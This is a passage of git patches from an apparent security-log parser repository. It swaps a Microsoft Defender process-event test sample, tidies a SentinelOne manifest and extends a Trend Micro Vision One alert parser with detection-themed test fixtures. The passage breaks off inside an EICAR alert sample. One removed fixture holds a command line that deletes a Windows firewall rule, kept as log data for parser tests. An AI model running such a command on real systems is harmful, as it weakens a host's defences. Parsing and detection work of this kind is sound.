\"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}",
     "sekoiaio": {
       "intake": {
         "dialect": "Microsoft 365 Defender",
@@ -9,7 +9,7 @@
     }
   },
   "expected": {
-    "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}",
+    "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}",
     "event": {
       "category": [
         "process"
@@ -19,115 +19,73 @@
         "info"
       ]
     },
-    "@timestamp": "2024-11-08T14:38:51.907372Z",
+    "@timestamp": "2024-10-22T15:09:44.594155Z",
     "action": {
       "properties": {
-        "AccountSid": "S-1-2-3",
-        "InitiatingProcessCommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000",
-        "InitiatingProcessFileSize": 145408,
-        "InitiatingProcessIntegrityLevel": "System",
-        "InitiatingProcessLogonId": "999",
-        "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
-        "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
-        "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer",
-        "InitiatingProcessVersionInfoInternalFileName": "file",
-        "InitiatingProcessVersionInfoOriginalFileName": "file.exe",
-        "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode",
-        "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880",
-        "LogonId": "999",
-        "ProcessIntegrityLevel": "System",
-        "ProcessTokenElevation": "TokenElevationTypeDefault",
-        "ProcessVersionInfoCompanyName": "Microsoft Corporation",
-        "ProcessVersionInfoFileDescription": "Network Command Shell",
-        "ProcessVersionInfoInternalFileName": "processcommand.exe",
-        "ProcessVersionInfoOriginalFileName": "processcommand.exe",
-        "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
-        "ProcessVersionInfoProductVersion": "10.0.22621.1"
+        "InitiatingProcessLogonId": "0",
+        "LogonId": "0"
       },
       "type": "ProcessCreated"
     },
     "file": {
-      "directory": "C:\\Windows\\processcommand.exe",
+      "directory": "/usr/bin/ps",
       "hash": {
-        "md5": "51a9cac9c4e8da44ffd7502be17604ee",
-        "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
-        "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
+        "md5": "098f6bcd4621d373cade4e832627b4f6",
+        "sha1": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3",
+        "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"
       },
-      "name": "processcommand.exe",
-      "size": 82944
+      "name": "ps",
+      "size": 144632
     },
     "host": {
-      "id": "123456789abcdef",
-      "name": "host.group.local"
+      "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca",
+      "name": "computer.intranet.example"
     },
     "microsoft": {
       "defender": {
         "report": {
-          "id": "17318"
+          "id": "67417"
         }
       }
     },
     "process": {
       "args": [
-        "HTTP",
-        "advfirewall",
-        "delete",
-        "embedded",
-        "firewall",
-        "incoming",
-        "name=\"program=description=",
-        "rule",
-        "server",
-        "traffic\""
+        "--no-headers",
+        "-A",
+        "-o",
+        "comm,pid,pcpu,pmem,rss,etimes"
       ],
-      "command_line": "\"processcommand.exe\" advfirewall firewall delete rule name=\"program=description= embedded HTTP server incoming traffic\"",
-      "name": "processcommand.exe",
+      "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers",
+      "name": "ps",
       "parent": {
-        "args": [
-          "-Embedding",
-          "ABCDEF0123456789",
-          "E",
-          "Global\\HOST0000"
-        ],
         "code_signature": {
-          "status": "Valid",
-          "subject_name": "OsVendor"
+          "status": "Unknown",
+          "subject_name": "Unknown"
         },
-        "command_line": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000",
-        "executable": "c:\\windows\\file.exe",
-        "hash": {
-          "md5": "51a9cac9c4e8da44ffd7502be17604ee",
-          "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
-          "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
-        },
-        "name": "file.exe",
-        "pid": 10868,
-        "start": "2024-11-08T14:38:00.674494Z",
+        "pid": 423627,
+        "start": "2024-10-22T15:09:44.590000Z",
         "user": {
-          "domain": "account domain",
-          "id": "S-1-2-3",
-          "name": "syst\u00e8me"
-        },
-        "working_directory": "c:\\windows"
+          "domain": "computer",
+          "name": "root"
+        }
       },
-      "pid": 4520,
-      "start": "2024-11-08T14:38:51.903048Z",
-      "working_directory": "C:\\Windows"
+      "pid": 423627,
+      "start": "2024-10-22T15:09:44.594155Z",
+      "working_directory": "/usr/bin"
     },
     "related": {
       "hash": [
-        "44543e0c6f30415c670c1322e61ca68602d58708",
-        "51a9cac9c4e8da44ffd7502be17604ee",
-        "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323",
-        "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
+        "098f6bcd4621d373cade4e832627b4f6",
+        "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
+        "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3"
       ],
       "user": [
-        "syst\u00e8me"
+        "root"
       ]
     },
     "user": {
-      "domain": "account domain",
-      "name": "syst\u00e8me"
+      "domain": "computer",
+      "name": "root"
     }
   }
 }
\ No newline at end of file

From a284a656b8d0f342bbdb8a6e70cb8332adc31db6 Mon Sep 17 00:00:00 2001
From: vg-svitla <131353512+vg-svitla@users.noreply.github.com>
Date: Thu, 28 Nov 2024 14:14:52 +0200
Subject: [PATCH 294/317] Update SentinelOne/identity/_meta/manifest.yml
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-authored-by: Sébastien Quioc <sebastien.quioc@sekoia.fr>
---
 SentinelOne/identity/_meta/manifest.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/SentinelOne/identity/_meta/manifest.yml b/SentinelOne/identity/_meta/manifest.yml
index 33be89396..1d18ad943 100644
--- a/SentinelOne/identity/_meta/manifest.yml
+++ b/SentinelOne/identity/_meta/manifest.yml
@@ -1,6 +1,6 @@
 uuid: b502e522-6996-4b12-9538-f69326b68243
-name: identity
-slug: identity
+name: SentinelOne Singularity Identity
+slug: sentinelone-singularity-identity
 
 description: >-
   SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats.

From db978530c9756d0b397b872be52be2cb07b45727 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Thu, 28 Nov 2024 14:58:43 +0200
Subject: [PATCH 295/317] Trend Micro Vision One - improve parser

---
 .../trend-micro-vision-one/_meta/fields.yml   | 10 +++
 .../trend-micro-vision-one/ingest/parser.yml  | 54 +++++++------
 .../tests/test_eicar_test_file_detection.json | 57 ++++++++++++++
 .../tests/test_information_gathering.json     | 76 +++++++++++++++++++
 .../tests/test_internal_network_scanner.json  |  1 +
 .../tests/test_process.json                   |  1 +
 .../tests/test_project_injection.json         | 76 +++++++++++++++++++
 .../tests/test_registry.json                  |  1 +
 .../tests/test_service_abuse.json             | 74 ++++++++++++++++++
 9 files changed, 328 insertions(+), 22 deletions(-)
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json

diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one/_meta/fields.yml
index f18d3cb5d..2f93f2919 100644
--- a/Trend Micro/trend-micro-vision-one/_meta/fields.yml	
+++ b/Trend Micro/trend-micro-vision-one/_meta/fields.yml	
@@ -1,3 +1,8 @@
+action.properties.ScriptBlockText:
+  description: ''
+  name: action.properties.ScriptBlockText
+  type: keyword
+
 trendmicro.vision_one.alert_id:
   description: ''
   name: trendmicro.vision_one.alert_id
@@ -8,6 +13,11 @@ trendmicro.vision_one.case_id:
   name: trendmicro.vision_one.case_id
   type: keyword
 
+trendmicro.vision_one.detection_name:
+  description: ''
+  name: trendmicro.vision_one.detection_name
+  type: keyword
+
 trendmicro.vision_one.incident_id:
   description: ''
   name: trendmicro.vision_one.incident_id
diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
index 09ca7f331..0353bb37b 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml	
+++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml	
@@ -25,12 +25,13 @@ stages:
       - set:
           "@timestamp": "{{parsed_event.message.createdDateTime}}"
 
-          host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}"
-          host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}"
+          host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.name }}"
+          host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.ips }}"
+          host.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.guid }}"
 
-          user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'emailAddress') | first).entityValue }}"
-          container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityValue }}"
-          container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityId }}"
+          user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'emailAddress') | first).entityValue }}"
+          container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityValue }}"
+          container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityId }}"
 
           rule.name: "{{parsed_event.message.model}}"
           rule.id: "{{parsed_event.message.model.modelId}}"
@@ -38,7 +39,7 @@ stages:
           event.url: "{{parsed_event.message.model.workbenchLink}}"
 
       - set:
-          user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}"
+          user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'account') | first).entityValue }}"
 
       - set:
           user.name: "{{final.user.id.split('\\\\') | last}}"
@@ -46,18 +47,23 @@ stages:
         filter: "{{final.user.id != null}}"
 
       - set:
-          process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}"
-          process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}"
-          process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}"
-          process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}"
-          process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}"
-          process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}"
-          process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}"
+          process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processCmd') | first).value }}"
+          process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentCmd') | first).value }}"
+          process.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFilePath') | first).value }}"
+          process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFilePath') | first).value }}"
+          process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha1') | first).value }}"
+          process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha256') | first).value }}"
+
+          process.parent.pid: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentPid') | first).value }}"
+          process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['processPid', 'objectPid']) | first).value }}"
+
+          process.parent.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha1') | first).value }}"
+          process.parent.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha256') | first).value }}"
 
       - set:
-          registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}"
-          registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}"
-          registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}"
+          registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[0] }}"
+          registry.key: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}"
+          registry.value: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value') | first).value }}"
           registry.path: >
             {%- set path = [] -%}
             {%- for indicator in parsed_event.message.indicators -%}
@@ -68,19 +74,22 @@ stages:
             {%- endfor -%}
             {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%}
 
-          registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}"
+          registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value_data') | first).value }}"
 
       - set:
           registry.data.type: "REG_SZ"
         filter: "{{final.registry.data.strings != null }}"
 
       - set:
-          file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}"
-          file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}"
-          file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}"
-          file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}"
+          file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'file_sha1') | selectattr('field', 'in', ['fileHash', 'objectFileHashSha1']) | first).value }}"
+          file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectFileHashSha256') | first).value }}"
+          file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['objectFilePath', 'fullPath']) | first).value }}"
+          file.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'fileName') | first).value }}"
 
-          user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}"
+          user.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'logonUser') | first).value }}"
+
+      - set:
+          action.properties.ScriptBlockText: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectRawDataStr') | first).value }}"
 
       - set:
           trendmicro.vision_one.severity: "{{parsed_event.message.severity}}"
@@ -89,3 +98,4 @@ stages:
           trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}"
           trendmicro.vision_one.status: "{{parsed_event.message.status}}"
           trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}"
+          trendmicro.vision_one.detection_name: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'detection_name') | first).value }}"
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
new file mode 100644
index 000000000..5fb30866d
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json	
@@ -0,0 +1,57 @@
+{
+  "input": {
+    "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": 